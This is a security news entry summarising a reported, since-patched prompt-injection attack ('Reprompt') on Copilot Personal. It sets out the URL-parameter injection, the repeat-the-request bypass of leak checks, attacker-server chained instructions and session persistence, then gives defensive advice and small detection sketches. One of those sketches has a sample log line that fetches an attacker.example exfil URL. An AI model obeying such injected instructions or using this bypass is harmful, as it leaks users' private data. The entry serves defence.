Varonis — Reprompt one-click Copilot session hijack (patched)
- Category: Security
- What happened: Varonis described “Reprompt”, a one-click flow that could trick Copilot Personal into running attacker-supplied instructions via a legitimate link.
- Key mechanism: Copilot accepted prompts via a URL `q=` parameter (parameter-to-prompt / "P2P" injection) and auto-executed them on page load.
- Why it's different: no plugins or connectors required; the attack abuses the default "deep link" UX rather than an add-on integration.
- Bypass pattern: Varonis claims Copilot's leak-prevention checks applied primarily to the first request; instructing Copilot to perform an action twice ("double-request") could leak data on the second attempt.
- Stealth escalation: “chain-request” lets the attacker’s server drip-feed follow-on instructions based on prior responses, making exfiltration intent hard to infer from the initial prompt alone.
- Session persistence: the write-up asserts the victim's authenticated Copilot session remained usable even after the chat/tab was closed, which is what turns "one click" into an ongoing channel.
- Status: Varonis and BleepingComputer report Microsoft patched the issue; Varonis says Microsoft 365 Copilot (enterprise) was not affected.
Why it matters
- “Prompt by URL” is a security boundary: if a product supports deep links that execute prompts automatically, that link format becomes a phishing primitive.
- Guardrails must persist across chains: applying policy only to the first tool/web request creates a predictable bypass target (“do it twice”).
- Agentic UX increases blast radius: if an assistant can read history, fetch URLs, and operate with a logged-in identity, prompt injection starts to look like session abuse, not “just bad output.”
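The "guardrails must persist" point can be made concrete. A minimal sketch, with all names hypothetical; this illustrates the shape of the fix, not Microsoft's actual guardrail:

```python
def make_guarded_fetch(fetch, looks_sensitive):
    """Wrap an outbound-fetch tool so the leak check runs on every call.

    A check that inspects only the first request re-opens the
    "do it twice" bypass; this wrapper is stateless by design.
    """
    def guarded_fetch(url: str, payload: str) -> str:
        if looks_sensitive(payload):  # evaluated on EVERY call, not just the first
            raise PermissionError("blocked: payload flagged as sensitive")
        return fetch(url, payload)
    return guarded_fetch

# Toy demonstration with a fake fetch tool:
sent = []
def fake_fetch(url, payload):
    sent.append((url, payload))
    return "ok"

guarded = make_guarded_fetch(fake_fetch, lambda p: "chat history" in p)
guarded("https://example.com", "hello")  # benign payload: allowed
for _ in range(2):  # "repeat twice" must fail both times
    try:
        guarded("https://example.com", "chat history dump")
    except PermissionError:
        pass
# sent contains only the benign request
```

The design choice worth copying is that `guarded_fetch` keeps no "already checked" state, so there is no second-request fast path to abuse.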
What to do
- Patch: ensure Windows, Edge, and Copilot components are fully updated (Reprompt is reported as fixed).
- Defensive validation (safe): in your environment, search web proxy/DNS logs for visits to copilot.microsoft.com/?q= originating from email or chat click-throughs; treat unusual volumes as suspicious.
- Harden "AI deep links": if you build internal assistants, disable auto-execute on link open, or require an explicit "Run this prompt" confirmation when the prompt originates from a URL parameter.
- Telemetry: log (and alert on) repeated tool calls that are semantically identical but occur back-to-back, since “repeat twice” is now a known bypass motif.
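The telemetry item can be sketched as a simple detector. The function name and similarity threshold are assumptions, and a real pipeline would use semantic similarity rather than `difflib` text matching:

```python
from difflib import SequenceMatcher

def flag_back_to_back_repeats(tool_calls, threshold=0.9):
    """Flag consecutive tool calls whose text is near-identical --
    the "repeat twice" bypass motif reported for Reprompt."""
    flagged = []
    for prev, cur in zip(tool_calls, tool_calls[1:]):
        if SequenceMatcher(None, prev, cur).ratio() >= threshold:
            flagged.append((prev, cur))
    return flagged

# Hypothetical tool-call log: two identical exfil-style fetches back to back.
calls = [
    "web.fetch https://attacker.example/exfil?d=summary",
    "web.fetch https://attacker.example/exfil?d=summary",
    "search internal docs for onboarding guide",
]
print(flag_back_to_back_repeats(calls))  # one flagged pair
```

A single repeat is often legitimate (retries, pagination), so in practice this signal is best combined with the destination domain and whether the call carries user data.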
Sources
- Varonis (primary): Reprompt: The Single-Click Microsoft Copilot Attack that Silently Steals Your Personal Data
- BleepingComputer (secondary): Reprompt attack hijacked Microsoft Copilot sessions for data theft
- Tenable (background mentioned by Varonis): TRA-2025-22